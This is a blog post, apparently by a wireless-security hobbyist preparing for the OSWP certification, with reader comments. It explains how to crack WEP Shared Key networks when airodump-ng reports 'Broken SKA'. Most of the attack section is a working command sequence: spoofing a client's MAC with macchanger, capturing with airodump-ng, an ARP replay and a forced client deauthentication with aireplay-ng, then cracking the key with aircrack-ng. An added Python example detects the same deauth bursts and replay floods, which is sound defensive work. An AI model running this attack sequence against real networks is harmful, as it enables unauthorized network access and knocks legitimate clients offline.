Defeating “Broken SKA” in WEP Shared Key Authentication attacks
Access Points that use WEP encryption are easy to pwn. The matter becomes a little more complicated when the same APs use Shared Key as the authentication method. The instructions you find on the internet tell you to deauthenticate a connected client from the AP after running airodump-ng, and that this operation will give you a .xor file containing the PRGA keystream with which to continue the attack (e.g. using the xor file to forge an ARP packet with packetforge-ng and injecting it with the interactive packet replay option of aireplay-ng). The worst thing is that this method, more often than not, does not work, and the only thing you get from airodump-ng is the message “Broken SKA” in the upper right corner. The reason it doesn’t work is that hardware manufacturers modify the 802.11 frame and airodump-ng doesn’t interpret it correctly.
How do we bypass this? One way I found is to use the connected client by spoofing its MAC address to conduct the attack. What we do is simply change our MAC address to that of the connected client and use an ARP request replay attack. To get an ARP packet quickly we deauthenticate the legitimate client from the AP, forcing it to reconnect and generate a new ARP request. Below you will find the commands you need to use. We are assuming that the AP is on channel 3 and that the AP and the client have MAC addresses AA:AA:AA:AA:AA:AA and CC:CC:CC:CC:CC:CC respectively.
- create the monitor interface on the correct channel
airmon-ng start wlan0 3
- spoof the MAC address of the mon0 interface to match the one of the connected client
ifconfig mon0 down
macchanger --mac CC:CC:CC:CC:CC:CC mon0
ifconfig mon0 up
- run airodump-ng to capture packets
airodump-ng --channel 3 -w SKA --bssid AA:AA:AA:AA:AA:AA mon0
- launch the ARP replay attack with aireplay-ng
aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
- deauthenticate the connected client to generate an ARP request
aireplay-ng -0 1 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
After this the data counter in airodump-ng will start growing and it will collect IVs that you can use to crack the WEP key with aircrack-ng.
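From the monitoring side, the procedure above leaves two unmistakable on-air signatures: a burst of deauthentication frames addressed to one client, followed by a flood of byte-identical WEP data frames (the re-injected ARP request keeps the same IV and ciphertext every time it is sent) from that client’s address. The following is an added example, not code from this post, showing how a wireless IDS would flag both; the frame records are constructed inline (a pcap parser would supply the same fields), and the AP/client MAC addresses reuse the placeholders used in this post.

```python
"""Flag deauthentication bursts and replayed WEP data frames in a capture.

Frame records are plain dicts: ts (seconds), kind ("data" or "deauth"),
src, dst, raw (frame bytes). The records below are constructed for the
example; a real deployment would fill them from a pcap or a monitor-mode
interface.
"""
from collections import defaultdict

WINDOW_S = 1.0          # sliding window used for rate counting
DEAUTH_THRESHOLD = 5    # more deauths than this per window to one client = burst
REPLAY_THRESHOLD = 10   # more byte-identical data frames per window = replay

AP = "AA:AA:AA:AA:AA:AA"      # placeholder addresses from the post
CLIENT = "CC:CC:CC:CC:CC:CC"


def _peak_rates(events, threshold, window_s):
    """events: iterable of (timestamp, key).

    Returns {key: peak_count} for every key whose event count inside some
    window of window_s seconds exceeds threshold (two-pointer sliding window).
    """
    times_by_key = defaultdict(list)
    for ts, key in events:
        times_by_key[key].append(ts)
    flagged = {}
    for key, times in times_by_key.items():
        times.sort()
        start, peak = 0, 0
        for end, ts in enumerate(times):
            while ts - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[key] = peak
    return flagged


def find_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window_s=WINDOW_S):
    """Deauth frames are unauthenticated management frames, so the only
    robust signal is rate: many deauths to one (src, dst) pair in a short time."""
    events = [(f["ts"], (f["src"], f["dst"])) for f in frames if f["kind"] == "deauth"]
    return _peak_rates(events, threshold, window_s)


def find_replayed_frames(frames, threshold=REPLAY_THRESHOLD, window_s=WINDOW_S):
    """A WEP frame carries its IV in clear; a re-injected frame repeats IV and
    ciphertext exactly, so (src, raw bytes) recurring many times per second
    is the replay fingerprint. Genuine traffic uses a fresh IV per frame."""
    events = [(f["ts"], (f["src"], f["raw"])) for f in frames if f["kind"] == "data"]
    return _peak_rates(events, threshold, window_s)


def analyze(frames):
    return {
        "deauth_bursts": find_deauth_bursts(frames),
        "replays": find_replayed_frames(frames),
    }


# Constructed capture: normal traffic, then a deauth burst, then a replay flood.
REPLAYED_ARP = bytes([0x08, 0x41]) + b"\x12\x34\x56" + b"\x11" * 36  # fixed IV + ciphertext


def constructed_capture():
    frames = []
    # 1) five legitimate client data frames, each with a different IV
    for i in range(5):
        raw = bytes([0x08, 0x41]) + i.to_bytes(3, "big") + b"\x00" * 36
        frames.append({"ts": i * 0.5, "kind": "data", "src": CLIENT, "dst": AP, "raw": raw})
    # 2) twelve deauth frames in the AP's name within 120 ms
    for i in range(12):
        frames.append({"ts": 3.0 + i * 0.01, "kind": "deauth", "src": AP, "dst": CLIENT,
                       "raw": b"\xc0\x00"})
    # 3) the same encrypted ARP request re-sent thirty times in under half a second
    for i in range(30):
        frames.append({"ts": 3.5 + i * 0.015, "kind": "data", "src": CLIENT, "dst": AP,
                       "raw": REPLAYED_ARP})
    return frames


if __name__ == "__main__":
    for name, hits in analyze(constructed_capture()).items():
        for key, count in hits.items():
            print(f"{name}: {key[0]} -> {count} frames in {WINDOW_S}s")
```

The replay check keys on the whole frame rather than on the IV alone because a busy client will legitimately reuse 24-bit IVs over time; an identical frame repeated tens of times per second is not something a normal station produces. Either alert on its own already identifies the affected client address, which is the one a spoofing attacker is borrowing.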
Here you can find a video of the entire procedure on Securitytube.net
6 Responses to Defeating “Broken SKA” in WEP Shared Key Authentication attacks
LICENSE

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Hi albatr0ss,
thanks for the demo in getting around the broken SKA. My previous lab did not get a XOR file due to broken SKA. You watched securitytube as well? Vivek rocks.
I have signed up for OSWP, have you already started the lesson?
sirbowen
Hi,
yes I did the previous version of OSWP (http://www.albatr0ss.it/2011/09/24/certificazione-oswp-il-wifu-di-backtrack/). In the very near future the new version will be available (http://www.offensive-security.com/offsec/offensive-security-wireless-attacks-updated/).
Yes Vivek rocks!
I found that this method does not work with every card. This method worked great with my old Intel wireless card, but it does not work well with a TP-Link adapter. I will get an Alfa card and try the deauthentication again. Also, the Alfa card is great for doing airbase-ng :p
I passed the OSWP
I just received the confirmation email today.
If the AP with SKA is already outputting enough #Data packets (like 10 to 50 per second) I do not necessarily need to use this, am I right?
I attempted this and was still unsuccessful. One thing I have just noticed is that I neglected to run the ARP replay attack before de-authing the client.
Would not performing the ARP replay first affect my ability to capture the handshake?
Any input is greatly appreciated!